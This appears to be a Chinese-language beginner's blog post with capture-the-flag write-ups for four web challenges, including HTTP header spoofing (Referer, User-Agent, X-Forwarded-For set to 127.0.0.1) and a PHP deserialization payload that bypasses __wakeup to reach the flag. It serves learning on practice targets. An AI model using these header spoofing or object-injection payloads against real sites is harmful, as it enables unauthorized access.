新手入门Web安全学习Week7
1.[极客大挑战 2019]Knife
这个怕是签到题
真·白给
根目录找到flag
2.[极客大挑战 2019]Http
http类的题目,直接打开burp 看见有个secret
需要修改头
Referer:https://www.Sycsecret.buuoj.cn提示浏览器需要使用Syclover,向头里面添加一行,也就是修改一下User-Agent的内容
又说只能在本地访问,那么意思就是要我们使用127.0.0.1来访问
那就
X-Forwarded-For:127.0.0.1就来咯
3.[RoarCTF 2019]Easy Calc
看源码有点东东
先扫根目录 发现f1agg
拿来把你
4.[极客大挑战 2019]PHP
开局一只猫然后看见一个重点 备份网站 用dirsearch扫一下
硬扫了七分钟出来个紫东东
下载来康康
点开flag.php里面想交 结果肯定不那么简单 果然就错了
再分析index.php
里面加载了一个class.php文件,然后采用get传递一个select参数,随后将之反序列化
再看class.php
读代码发现password=100,username=admin,在执行__destruct()的时候可以获得flag
但是wakeup方法会导致username成为guest,因此需要通过序列化字符串中对象的个数来绕过该方法
上代码
<?php
class Name
{private $username = 'admin';private $password = '100';
}
$a = new Name();
#进行url编码,防止%00对应的不可打印字符在复制时丢失
echo urlencode(serialize($a));
#未编码的情况
//O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
//使用时将URL编码的结果中Name后面的2换成3或其他值
?>结果:
I have a cat!http://56881b4c-bd6e-4b5c-96a1-bc40b628f7bc.node4.buuoj.cn:81/index.php?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
博客就这样了 想给赞就给吧 不给也行
新手入门Web安全学习Week7相关推荐
- ps如何修改图片大小尺寸_PS新手入门教程:学习如何修改画布的大小
PS新手入门教程:学习如何修改画布的大小.在photoshop中,可以把画布理解为一张白纸,而我们要处理的图像可以理解为这张白纸表面上的画.我们修改画布的大小时,图像并不会随着画布的大小而整体变大或缩 ...
- 纯新手入门机器/深度学习自学指南(附一个月速成方案)
原作:Masum Hasan 问耕 编译整理 量子位 出品 | 公众号 QbitAI 怎么入门机器/深度学习? 回答这个问题,最先要考虑的问题是:你有多少时间? 准备用三个月入门,和想要一个月速成,肯 ...
- web后端语言_web前端学习路线图_快速入门web前端学习路线图
如何学好Web前端开发技术?前端学习路线是什么?如今,移动开发的发展依旧如火如荼,企业对于Web前端人才需求产生了巨大的缺口,从事Web前端开发的程序员们则是其中较大的获益者.Web前端的广泛运用,造 ...
- 新手入门 Python 的学习网站
1 Python 小例子 来自 github 网站上的项目,提供了 141 个代码小样,并标注了难度等级. 告别枯燥,致力于打造 Python 经典小例子.小案例. https://github.co ...
- 如何学python新手入门_如何学习Python,以及新手如何入门?
好久以前就想写这个回答了. 学校里面开了一门极其火的python通识课,我幸运选上,加上我对python还是比较感兴趣的.就这样我开始了我的python学习之路. 提前说明吧,我真的还只是一个纯纯纯新 ...
- 新手入门Web前端,你需要克服这几点困难
Web前端是一个入行门槛较低的开发技术,更是近几年热门的职业,Web前端不仅薪资高发展前景好,是很多年轻人向往的一个职业.看到这里很多小伙伴想问:学Web前端需要注意哪些问题? 学Web前端需要克服以 ...
- 新手入门Web前端要掌握的4项基础技能
Web前端开发是近些年非常受欢迎的职业,几乎每个互联网企业都会招聘Web前端工程师.但目前我国高校并没有开设Web前端专业,想要成为Web前端工程师系统学习就成为很多人选择的方式.那么,Web前端要掌 ...
- python不可实现的领域3d_岩土工程新手入门指南---FLAC3D学习指导与建议
1 FLAC3D简介 FLAC3D软件是专为岩土工程领域开发的软件,用于处理土,岩石,地下水,地热以及地层支护.作为一款耳熟人详.基于有限差分的大型岩土工程数值分析软件,随着其不断的迭代更新,如今IT ...
- Unity新手入门与进阶学习书籍与教程推荐
读研的时候喜欢做游戏,最开始在诺基亚N9手机上开发过几款产品,有APP也有游戏.用的是Qt Quick,最先在N9上发布,之后又了解到黑莓的BB10系统,也可以用Qt Quick开发,所以就把几个产品 ...
最新文章
- 为什么UART串口通信要16倍过采样数据
- golang中如何抓取panic让程序正常退出
- Unity3D研究院之Android同步方法读取streamingAssets
- 看完这篇还不懂 MySQL 主从复制,可以回家躺平了~
- flask response Content-Type
- [双调]落梅风(寿阳曲).焰火似龙
- webpack5学习与实战-(十)-source_map
- VR+教育 虚拟现实(VR)智慧教室整体解决方案
- tomcat是干什么的? 什么叫web容器以及作用?
- 安卓升级AndroidX手把手教程
- python求一元三次方程的根_【九年级 】知识点8 一元二次方程根的判别式的应用...
- 【Web前端】HTML—6.表单标签
- 什么是单工,半双工,全双工
- 牢记这一波CAD快捷键,制图速度坐火箭!
- APP的文件数据直传腾讯云COS实践
- Python中的numpy.cumsum()
- “创药网”-创新药领域专业资讯网站
- setCapture和releaseCapture的小应用
- 视觉导航定位系统工作原理及过程
- roc曲线spss怎么做_SPSS单因素ROC曲线及多因素联合诊断ROC曲线绘制(原创手把手) - 医学统计和生物统计讨论版 -丁香园论坛...